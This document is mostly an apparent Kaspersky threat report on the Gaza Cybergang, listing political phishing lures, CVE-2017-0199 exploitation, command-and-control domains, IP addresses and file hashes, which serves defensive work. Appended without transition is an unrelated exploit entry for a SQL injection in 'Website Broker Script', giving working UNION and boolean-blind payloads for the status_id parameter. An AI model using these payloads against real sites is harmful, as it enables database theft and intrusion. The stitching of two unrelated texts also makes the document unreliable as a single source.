Gaza cybergang is increasingly relying on advanced and up-to-date social engineering techniques with political and humanitarian aspects that reflect on direct regional occurrences, here is a small list of incidents that was utilized multiple time each:

style=”margin-bottom:0!important”>

  • Palestinian Government not paying salaries for Gaza employees
  • Palestinian prisoners’ hunger strike in Israeli jails
  • The political crisis in Qatar

Recent targets by the group does seem to be varied in nature, attackers do not seem to be selectively choosing targets, but rather seeking any type of intelligence.

Example lure

MD5: 66f144be4d4ef9c83bea528a4cd3baf3

تصريح لأمير قطر واتهام الإمارات في اختراق وكالة الأنباء.exe

(Translation: A statement by the Emir of Qatar accusing the UAE of breaking the news agency)

Attackers are recently utilising political events related to the Qatar political crisis in the Middle East targeting their victims.

Original filename:Qatar-27-5-2017.rar

Extracts to 66f144be4d4ef9c83bea528a4cd3baf3

تصريح لأمير قطر واتهام الإمارات في اختراق وكالة الأنباء.exe

Sha256 7fcac2f18a8844e4af9f923891cfb6f637a99195a457b6cdb916926d709c6a04

C2: moreoffer[.]life

First seen: 27 May 2017

Translation: new details on the hack of the Qatar News Agency

2. The use of Microsoft Access files with macros

Microsoft Access file with macro is another new development by the attackers group, Ms access database embedded Macros are proving to provide very low detection.

MD5: 6d6f34f7cfcb64e44d67638a2f33d619

Filename: GAZA2017.mdb

C1: http://download.data-server.cloudns[.]club/GAZA2017.mdb

Downloads and executes:

style=”margin-bottom:0!important”>

  • data-server.cloudns[.]club/wordindexer.exe
  • data-server.cloudns[.]club/indexer.exe

Translation: database of employees not receiving salaries, click “enable content” to see data

Decrypted code

3. Exploitation of the CVE 2017-0199 vulnerability

MD5: 87a67371770fda4c2650564cbb00934d

First seen: 20-06-2017

Filenames:

style=”margin-bottom:0!important”>

  • hamas.doc
  • نقاط اتفاق حماس وتيار فتح الاصلاحي.doc (Translation: the points of agreement between Hamas and the reforment Fateh movement)
  • محضر اجتماع مركزية فتح الليلة.doc (Translation: minutes of the tonight Fateh meeting)
  • سلفة أم راتب للموظفين يوم الثلاثاء المقبل؟.doc (Translation: An advance on salary or full salary for employees next Tuesday?)

The attacks are typical exploitation of CVE-2017-0199 starting from an email, distributing a malicious RTF document.The vulnerability is then in the code that handles Ole2Link embedded objects, which allows Microsoft office Word to run remote files, downloaded from 138.68.242[.]68 in this case. The downloaded payload is Cobaltstrike, which then connects to lol.mynetav[.]org to receive commands from attackers. Additional details on the CVE 2017-0199 usage with Cobaltstrike by Gaza cybergang can be found here: http://bobao.360.cn/learning/detail/4193.html

4. Possible Android mobile malware

Traces of APK files have been seen on one of the attackers command centers starting from 23-04-2017.

URL: http://alasra-paper.duckdns[.]org/send/%D9%88%ket-Edition-1.04_ApkHouse[.]com/Dont-Starve-Pocket-Edition-1.04_ApkHouse[.]com.apk

The file name (Dont-Starve-Pocket-Edition-1.04_ApkHouse[.]com.apk), is an Android application file hiding as a popular game. We believe the android trojan could be related to previously investigated Android trojan around Gaza strip

Conclusion

Gaza Cybergang has demonstrated a large number of attacks, advanced social engineering, in addition to the active development of attacks, infrastructure and the utilization of new methods and techniques. Attackers are actively improving their toolkit in an effort to minimize their exposure to security products and services. Kaspersky Lab expects these types of attacks to intensify even more both in quality and quantity in the near term.

In order to protect your company from malware, Kaspersky Lab researchers recommend implementing the following measures:

style=”margin-bottom:0!important”>

  • Educating staff to be able to distinguish spear-phishing emails or a phishing link from legitimate emails and links
  • Use proven corporate grade security solution in combination with anti-targeted attacks solutions capable of catching attacks by analyzing network anomalies
  • Providing security staff with access to latest threat intelligence data, which will arm them with helpful tools for targeted attacks prevention and discovery, such as Indicators of compromise and YARA rules
  • Making sure enterprise grade patch management processes are well established and executed.

More information about Gaza cybergang is available to customers of Kaspersky Intelligence Reporting Service. Contact: [email protected]

Appendix 1: malware files descriptions and decoys

In the following, we list found description of malware files starting from March 2017, including decoys used, first dates files seen, parent files…

b7390bc8c8a9a71a69ce4cc0c928153b

Parent file: 970e6188561d6c5811a8f99075888d5f 5-4-2017.zip

C2: moreoffer[.]life

First seen: 5 April 2017

Translation: Get to know the women wearing niqab and talking bad about the kingdom

f43188accfb6923d62fe265d6d9c0940

Filename: Gcc-Ksa-uae.exe

C2: moreoffer[.]life (185.11.146[.]68)

First Seen: 21 March 2017

Translation: the permanent delegation of the cooperation council for the Arab states of the Gulf (GCC) to the United Nation and other international organizations, Geneva

056d83c1c1b5f905d18b3c5d58ff5342

مراسلة بخصوص اجتماع رؤساء البعثات.Filename: exe

Translation: Correspondence regarding the meeting of Heads of Missions (Saudi related)

Parent file: fb549e0c2fffd390ee7c4538ff30ac3e

C2: moreoffer[.]life

First Seen: 16 March 2017

Translation: The fourth foreign meeting of the Kingdom’s head of missions under the title “message of the embassador”.

0ee4757ab9040a95e035a667457e4bc6

Filename: 27-4-2017 Fateh Gaza plo.exe

C2: signup.updatesforme[.]club

First seen 27 April 2017

Translation: Clarification report

7bef124131ffc2ef3db349b980e52847

الأخ اسماعيل هنية -نائب رئيس المكتب السياسي .exe

(Translation: Brother Ismail Haniyah – Deputy Head of the Political Bureau)

C2: ping.topsite[.]life

First seen: 14 March 2017

Translation: Brother Ismail Haniyah – Deputy Head of the Political Bureau

70d03e34cadb0f1e1bc6f4bf8486e4e8

download-file.duckdns[.]org/send/Egyptian_agreement_with_President_Mahmoud_Abbas.exe

C1: download-file.duckdns[.]org

C2: ping.topsite[.]life

First seen: 30 March 2017

Translation: methods to apply the palestinian national agreement pact.

67f48fd24bae3e63b29edccc524f4096

C1: http://alasra-paper.duckdns[.]org/send/رسالة_وفد_الرئيس ابومازن_لحماس_في قطاع_غزة.rar

C2: ping.topsite[.]life

RAR extracts to: 5d74487ea96301a933209de3d145105d

رسالة_وفد_الرئيس ابومازن_لحماس_في قطاع_غزة.exe

First seen: 17 April 2017

Translation: a severely threatening message from Abbas’s delegation to Hamas

7b536c348a21c309605fa2cd2860a41d

C1: http://alasra-paper.duckdns[.]org/send/ورقة_الاسرى_المقدمة_لفك_الاضراب .rar

Extracts to: d973135041fd26afea926e51ce141198, named (RTLO technique):

ورقة الاسرى المقدمة لفك الاضراب .exe

Translation:  captives paper submitted to stop the strike

C2:ping.topsite[.]life

First seen: 17 April 2017

Translation: The primary demands of the captives in the strike of freedom and dignity

9cf9d89061917e9f48481db80e674f0e9

وثائق تنشر لأول مره عن حكم حماس لقطاع غزه .exe     c11516cd8c797f0182d63cdf343d08ed

Translation: Documents published for the first time on Hamas ruling of Gaza Strip

C1: http://hamas-wathaq.duckdns[.]org/send/وثائق_تنشر_لأول_مره_عن_حكم_حماس_لقطاع_غزه.rar

C2:ping.topsite[.]life

First seen: 16 April 2017

Translation: Scandals and facts published for the first time on Hamas’s ruling of Gaza Strip

Appendix 2: List of IOCs

Malicious domain names

moreoffer[.]life
signup.updatesforme[.]club
ping.topsite[.]life
alasra-paper.duckdns[.]org
hamas-wathaq.duckdns[.]org
download.data-server.cloudns[.]club
upgrade.newshelpyou[.]com
manual.newphoneapp[.]com
hnoor.newphoneapp[.]com
lol.mynetav[.]org

IP addresses

138.68.242[.]68
185.86.149[.]168
185.11.146[.]68
45.32.84[.]66
45.32.71[.]95
107.161.27[.]158
46.246.87[.]74

Hashes

MD5
87a67371770fda4c2650564cbb00934d
4f3b1a2088e473c7d2373849deb4536f
c078743eac33df15af2d9a4f24159500
3ff60c100b67697163291690e0c2c2b7
a3de096598e3c9c8f3ab194edc4caa76
7d3426d8eb70e4486e803afb3eeac14f
3f67231f30fa742138e713085e1279a6
552796e71f7ff304f91b39f5da46499b
6fba58b9f9496cc52e78379de9f7f24e
eb521caebcf03df561443194c37911a5
b68fcf8feb35a00362758fc0f92f7c2e
d87c872869023911494305ef4acbd966
66f144be4d4ef9c83bea528a4cd3baf3
B7390bc8c8a9a71a69ce4cc0c928153b
F43188accfb6923d62fe265d6d9c0940
056d83c1c1b5f905d18b3c5d58ff5342
0ee4757ab9040a95e035a667457e4bc6
7bef124131ffc2ef3db349b980e52847
70d03e34cadb0f1e1bc6f4bf8486e4e8
67f48fd24bae3e63b29edccc524f4096
7b536c348a21c309605fa2cd2860a41d
cf9d89061917e9f48481db80e674f0e9
6d6f34f7cfcb64e44d67638a2f33d619
86a89693a273d6962825cf1846c3b6ce
5472d0554a0188c0ecebd065eddb9485

SHA256
0b6fe466a3ba36895208e754b155a193780c79ba8b5c1c9f02c4f7e479116e5f
0c4aa50c95c990d5c5c55345626155b87625986881a2c066ce032af6871c426a
0d235478ae9cc87b7b907181ccd151b618d74955716ba2dbc40a74dc1cdfc4aa
1f2b128d26a58a572ea1faee2c4d9dc759eb8add16d9ad0547b3f0305fea212a
205f32cc717c2d82baeff9ff5aa9fc31967b6ae5cde22fafe14aec9c9ec62acc
284af7a2fafdbff3bbc28b9075f469d2352758b62d182b0e056d29ee74688126
344dc6ece5a6dacce9050a65305d4b34865756051a6f414477b6fa381e1c1b63
42e4298f5162aba825309673187e27121e3f918238e81f3a6e021c03f3455154
44a8d0561a9cc6e24d6935ff4c35b7b7db50c4001eb01c48ea1cfd13253bc694
57a12f20c6bbd69b93e76d6d5a31d720046b498aa880b95b85a4f3fda28aac4f
72b039550d31afaeee11dedf7d80333aeda5c504272d426ae0d91bc0cd82c5b0
72d2ad8f38e60c23c96698149507fc627664a5706a4431b96014fbf25495b529
788f7fd06030f87d411c61efbc52a3efca03359570353da209b2ce4ccf5b4b70
7fcac2f18a8844e4af9f923891cfb6f637a99195a457b6cdb916926d709c6a04
84adba3c81ad1c2a8285c31d1171f6f671492d9f3ed5ee2c7af326a9a8dc5278
852ccc491204f227c3da58a00f53846296454d124b23021bdb168798c8eee2fb
86bd78b4c8c94c046d927fb29ae0b944bf2a8513a378b51b3977b77e59a52806
9347a47d63b29c96a4f39b201537d844e249ac50ded388d66f47adc4e0880c7e
b597d7b5b9c2f1962257f912e911961ad0da4c28fc6a90a0b7db4e242aa007d8
bfb88878a22c23138a67cc25872e82d77e54036b846067ddc43e988c50379915
c23f715c8588c8d8725352ed515749389d898996107132b2d25749a4efc82a90
c47bc2c15f08655d158bb8c9d5254c804c9b6faded526be6879fa94ea4a64f72
db53b35c80e8ec3f8782c4d34c83389e8e9b837a6b3cc700c1b566e4e4450ec2
dd9debe517717552d7422b08a477faa01badbcc4074830c080a1a1c763e1a544
b800d29d6e1f2f85c5bc036e927c1dae745a3c646389599b0754592d76b5564b

Website Broker Script SQL Injection

# # # # # 
# Exploit Title: Website Broker Script - 'status_id' Parameter SQL Injection
# Dork: N/A
# Date: 30.10.2017
# Vendor Homepage: http://www.phpscriptsmall.com/
# Software Link: http://www.exclusivescript.com/product/UwCG4464436/php-scripts/website-broker-script
# Demo: http://www.officialwebsiteforsale.com/official/
# Version: N/A
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: CVE-2017-15992
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject sql commands....
#
# Proof of Concept:
#
# http://localhost/[PATH]/status_list.php?status_id=[SQL]
#
# -12'++/*!50000UNION*/+/*!50000SELECT*/+1,2,CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),4,5--+-
#
# Parameter: status_id (GET)
# Type: boolean-based blind
# Title: AND boolean-based blind - WHERE or HAVING clause
# Payload: status_id=12' AND 2717=2717 AND 'fNVA'='fNVA
#
# Type: UNION query
# Title: Generic UNION query (NULL) - 5 columns
# Payload: status_id=-1351' UNION ALL SELECT NULL,CONCAT(0x71716b7a71,0x4857455572714d7a48506145547643734d6b794f515a506d6469764f5666736c6d754c7468444178,0x716a6b6271),NULL,NULL,NULL-- AJcv
#
# Etc..
# # # # #